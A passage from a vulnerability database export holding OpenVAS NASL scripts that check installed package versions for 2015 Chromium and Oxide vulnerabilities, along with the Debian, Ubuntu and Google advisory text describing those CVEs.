to\nescape from the sandbox.\n\nCVE-2015-1253\nA cross-origin bypass issue was discovered in the DOM parser.\n\nCVE-2015-1254\nA cross-origin bypass issue was discovered in the DOM editing\nfeature.\n\nCVE-2015-1255\nKhalil Zhani discovered a use-after-free issue in WebAudio.\n\nCVE-2015-1256\nAtte Kettunen discovered a use-after-free issue in the SVG\nimplementation.\n\nCVE-2015-1257\nmiaubiz discovered an overflow issue in the SVG implementation.\n\nCVE-2015-1258\ncloudfuzzer discovered an invalid size parameter used in the\nlibvpx library.\n\nCVE-2015-1259\nAtte Kettunen discovered an uninitialized memory issue in the\npdfium library.\n\nCVE-2015-1260\nKhalil Zhani discovered multiple use-after-free issues in chromium", "cvss3": {}, "published": "2015-05-22T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3267-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1252", "CVE-2015-1256", "CVE-2015-1261", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1264"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703267", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703267", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3267.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3267-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703267\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\",\n \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\",\n \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1261\", \"CVE-2015-1262\",\n \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n script_name(\"Debian Security Advisory DSA 3267-1 (chromium-browser - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-22 00:00:00 +0200 (Fri, 22 May 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3267.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"chromium-browser on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), these problems have been fixed in\nversion 43.0.2357.65-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 43.0.2357.65-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1251\nSkyLined discovered a use-after-free issue in speech\nrecognition.\n\nCVE-2015-1252\nAn out-of-bounds write issue was discovered that could be used to\nescape from the sandbox.\n\nCVE-2015-1253\nA cross-origin bypass issue was discovered in the DOM parser.\n\nCVE-2015-1254\nA cross-origin bypass issue was discovered in the DOM editing\nfeature.\n\nCVE-2015-1255\nKhalil Zhani discovered a use-after-free issue in WebAudio.\n\nCVE-2015-1256\nAtte Kettunen discovered a use-after-free issue in the SVG\nimplementation.\n\nCVE-2015-1257\nmiaubiz discovered an overflow issue in the SVG implementation.\n\nCVE-2015-1258\ncloudfuzzer discovered an invalid size parameter used in the\nlibvpx library.\n\nCVE-2015-1259\nAtte Kettunen discovered an uninitialized memory issue in the\npdfium library.\n\nCVE-2015-1260\nKhalil Zhani discovered multiple use-after-free issues in chromium's\ninterface to the WebRTC library.\n\nCVE-2015-1261\nJuho Nurminen discovered a URL bar spoofing issue.\n\nCVE-2015-1262\nmiaubiz discovered the use of an uninitialized class member in\nfont handling.\n\nCVE-2015-1263\nMike Ruddy discovered that downloading the spellcheck dictionary\nwas not done over HTTPS.\n\nCVE-2015-1264\nK0r3Ph1L discovered a cross-site scripting issue that could be\ntriggered by bookmarking a site.\n\nCVE-2015-1265\nThe chrome 43 development team found and fixed various issues\nduring internal auditing. Also multiple issues were fixed in\nthe libv8 library, version 4.3.61.21.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"43.0.2357.65-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium\", ver:\"43.0.2357.65-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"43.0.2357.65-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"43.0.2357.65-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"43.0.2357.65-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:53:43", "description": "Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1251 \nSkyLined discovered a use-after-free issue in speech\nrecognition.\n\nCVE-2015-1252 \nAn out-of-bounds write issue was discovered that could be used to\nescape from the sandbox.\n\nCVE-2015-1253 \nA cross-origin bypass issue was discovered in the DOM parser.\n\nCVE-2015-1254 \nA cross-origin bypass issue was discovered in the DOM editing\nfeature.\n\nCVE-2015-1255 \nKhalil Zhani discovered a use-after-free issue in WebAudio.\n\nCVE-2015-1256 \nAtte Kettunen discovered a use-after-free issue in the SVG\nimplementation.\n\nCVE-2015-1257 \nmiaubiz discovered an overflow issue in the SVG implementation.\n\nCVE-2015-1258 \ncloudfuzzer discovered an invalid size parameter used in the\nlibvpx library.\n\nCVE-2015-1259 \nAtte Kettunen discovered an uninitialized memory issue in the\npdfium library.\n\nCVE-2015-1260 \nKhalil Zhani discovered multiple use-after-free issues in chromium", "cvss3": {}, "published": "2015-05-22T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3267-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1252", "CVE-2015-1256", "CVE-2015-1261", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1264"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703267", "href": "http://plugins.openvas.org/nasl.php?oid=703267", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3267.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3267-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703267);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\",\n \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\",\n \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1261\", \"CVE-2015-1262\",\n \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n script_name(\"Debian Security Advisory DSA 3267-1 (chromium-browser - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-05-22 00:00:00 +0200 (Fri, 22 May 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3267.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"chromium-browser on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), these problems have been fixed in\nversion 43.0.2357.65-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 43.0.2357.65-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1251 \nSkyLined discovered a use-after-free issue in speech\nrecognition.\n\nCVE-2015-1252 \nAn out-of-bounds write issue was discovered that could be used to\nescape from the sandbox.\n\nCVE-2015-1253 \nA cross-origin bypass issue was discovered in the DOM parser.\n\nCVE-2015-1254 \nA cross-origin bypass issue was discovered in the DOM editing\nfeature.\n\nCVE-2015-1255 \nKhalil Zhani discovered a use-after-free issue in WebAudio.\n\nCVE-2015-1256 \nAtte Kettunen discovered a use-after-free issue in the SVG\nimplementation.\n\nCVE-2015-1257 \nmiaubiz discovered an overflow issue in the SVG implementation.\n\nCVE-2015-1258 \ncloudfuzzer discovered an invalid size parameter used in the\nlibvpx library.\n\nCVE-2015-1259 \nAtte Kettunen discovered an uninitialized memory issue in the\npdfium library.\n\nCVE-2015-1260 \nKhalil Zhani discovered multiple use-after-free issues in chromium's\ninterface to the WebRTC library.\n\nCVE-2015-1261 \nJuho Nurminen discovered a URL bar spoofing issue.\n\nCVE-2015-1262 \nmiaubiz discovered the use of an uninitialized class member in\nfont handling.\n\nCVE-2015-1263 \nMike Ruddy discovered that downloading the spellcheck dictionary\nwas not done over HTTPS.\n\nCVE-2015-1264 \nK0r3Ph1L discovered a cross-site scripting issue that could be\ntriggered by bookmarking a site.\n\nCVE-2015-1265 \nThe chrome 43 development team found and fixed various issues\nduring internal auditing. Also multiple issues were fixed in\nthe libv8 library, version 4.3.61.21.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"43.0.2357.65-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium\", ver:\"43.0.2357.65-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"43.0.2357.65-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"43.0.2357.65-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"43.0.2357.65-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-07-19T22:13:24", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-05-27T00:00:00", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities - 02 - May15 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1252", "CVE-2015-1256", "CVE-2015-3910", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1264"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805632", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805632", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities - 02 - May15 (Mac OS X)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805632\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\",\n \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\",\n \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1262\", \"CVE-2015-1263\",\n \"CVE-2015-1264\", \"CVE-2015-1265\", \"CVE-2015-3910\");\n script_bugtraq_id(74723);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-05-27 09:42:43 +0530 (Wed, 27 May 2015)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Google Chrome Multiple Vulnerabilities - 02 - May15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - Multiple unspecified vulnerabilities in Google V8.\n\n - Use-after-free vulnerability in the SpeechRecognitionClient implementation\n in the Speech subsystem.\n\n - common/partial_circular_buffer.cc script in Google Chrome does not properly\n handle wraps.\n\n - Vulnerability in core/html/parser/HTMLConstructionSite.cpp in the DOM\n implementation in Blink, as used in Google Chrome.\n\n - Vulnerability in core/dom/Document.cpp in Blink, as used in Google Chrome\n which allows the inheritance of the designMode attribute.\n\n - Use-after-free vulnerability in\n content/renderer/media/webaudio_capturer_source.cc script in the WebAudio\n implementation.\n\n - Use-after-free vulnerability in the SVG implementation in Blink.\n\n - platform/graphics/filters/FEColorMatrix.cpp script in the SVG implementation\n in Blink.\n\n - Google Chrome relies on libvpx code that was not built with an appropriate\n size-limit value.\n\n - PDFium, as used in Google Chrome, does not properly initialize memory.\n\n - Multiple use-after-free vulnerabilities in\n content/renderer/media/user_media_client_impl.cc script in the WebRTC\n implementation.\n\n - Cross-site scripting (XSS) vulnerability in Google Chrome.\n\n - The Spellcheck API implementation in Google Chrome before does not use an\n HTTPS session for downloading a Hunspell dictionary.\n\n - platform/fonts/shaping/HarfBuzzShaper.cpp script in Blink, does not\n initialize a certain width field.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial of service, inject arbitrary web script, spoof the\n URL bar or deliver misleading popup content, bypass the Same Origin Policy and\n a sandbox protection mechanism, execute arbitrary code and allow\n man-in-the-middle attackers to deliver incorrect spelling suggestions or\n possibly have unspecified other impact via crafted dimensions.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 43.0.2357.65 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 43.0.2357.65 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2015/05/stable-channel-update_19.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"43.0.2357.65\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 43.0.2357.65' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-06-09T00:00:00", "type": "openvas", "title": "Ubuntu Update for oxide-qt USN-2610-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1256", "CVE-2015-3910", "CVE-2015-1258", "CVE-2015-1255"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842213", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842213", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for oxide-qt USN-2610-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842213\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-09 11:06:47 +0200 (Tue, 09 Jun 2015)\");\n script_cve_id(\"CVE-2015-1253\", \"CVE-2015-1254\", \"CVE-2015-1255\", \"CVE-2015-1256\",\n \"CVE-2015-1257\", \"CVE-2015-1258\", \"CVE-2015-1260\", \"CVE-2015-1262\",\n \"CVE-2015-1265\", \"CVE-2015-3910\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for oxide-qt USN-2610-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'oxide-qt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Several security issues were discovered\nin the DOM implementation in Blink. If a user were tricked in to opening a\nspecially crafted website, an attacker could potentially exploit these to\nbypass Same Origin Policy restrictions. (CVE-2015-1253, CVE-2015-1254)\n\nA use-after-free was discovered in the WebAudio implementation in\nChromium. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to cause a denial of\nservice via renderer crash, or execute arbitrary code with the privileges\nof the sandboxed render process. (CVE-2015-1255)\n\nA use-after-free was discovered in the SVG implementation in Blink. If a\nuser were tricked in to opening a specially crafted website, an attacker\ncould potentially exploit this to cause a denial of service via renderer\ncrash, or execute arbitrary code with the privileges of the sandboxed\nrender process. (CVE-2015-1256)\n\nA security issue was discovered in the SVG implementation in Blink. If a\nuser were tricked in to opening a specially crafted website, an attacker\ncould potentially exploit this to cause a denial of service via renderer\ncrash. (CVE-2015-1257)\n\nAn issue was discovered with the build of libvpx. If a user were tricked\nin to opening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via renderer crash, or execute\narbitrary code with the privileges of the sandboxed render process.\n(CVE-2015-1258)\n\nMultiple use-after-free issues were discovered in the WebRTC\nimplementation in Chromium. If a user were tricked in to opening a\nspecially crafted website, an attacker could potentially exploit these to\ncause a denial of service via renderer crash, or execute arbitrary code\nwith the privileges of the sandboxed render process. (CVE-2015-1260)\n\nAn uninitialized value bug was discovered in the font shaping code in\nBlink. If a user were tricked in to opening a specially crafted website,\nan attacker could potentially exploit this to cause a denial of service\nvia renderer crash. (CVE-2015-1262)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2015-1265)\n\nMultiple security issues were discovered in V8. If a user were tricked\nin to opening a specially crafted website, an attacker could potentially\nexploit these to read uninitialized memory, cause a denial of service via\nrenderer crash or execute arbitrary code with the privileges of the\nsandboxed render process. (CVE-2015-3910)\");\n script_tag(name:\"affected\", value:\"oxide-qt on Ubuntu 14.10,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2610-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2610-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.7.8-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.7.8-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:amd64\", ver:\"1.7.8-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:i386\", ver:\"1.7.8-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:amd64\", ver:\"1.7.8-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:i386\", ver:\"1.7.8-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.7.8-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.7.8-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:i386\", ver:\"1.7.8-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:amd64\", ver:\"1.7.8-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:amd64\", ver:\"1.7.8-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:i386\", ver:\"1.7.8-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:53", "description": "Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1235\nA Same Origin Policy bypass issue was discovered in the HTML\nparser.\n\nCVE-2015-1236\nAmitay Dobo discovered a Same Origin Policy bypass in the Web Audio\nAPI.\n\nCVE-2015-1237\nKhalil Zhani discovered a use-after-free issue in IPC.\n\nCVE-2015-1238cloudfuzzer\ndiscovered an out-of-bounds write in the skia\nlibrary.\n\nCVE-2015-1240w3bd3vil\ndiscovered an out-of-bounds read in the WebGL\nimplementation.\n\nCVE-2015-1241\nPhillip Moon and Matt Weston discovered a way to trigger local user\ninterface actions remotely via a crafted website.\n\nCVE-2015-1242\nA type confusion issue was discovered in the v8 javascript\nlibrary.\n\nCVE-2015-1244\nMike Ruddy discovered a way to bypass the HTTP Strict Transport Security\npolicy.\n\nCVE-2015-1245\nKhalil Zhani discovered a use-after-free issue in the pdfium\nlibrary.\n\nCVE-2015-1246\nAtte Kettunen discovered an out-of-bounds read issue in\nwebkit/blink.\n\nCVE-2015-1247Jann Horn discovered that file:\nURLs in OpenSearch documents were not\nsanitized, which could allow local files to be read remotely when using\nthe OpenSearch feature from a crafted website.\n\nCVE-2015-1248\nVittorio Gambaletta discovered a way to bypass the SafeBrowsing feature,\nwhich could allow the remote execution of a downloaded executable\nfile.\n\nCVE-2015-1249\nThe chrome 41 development team found various issues from internal\nfuzzing, audits, and other 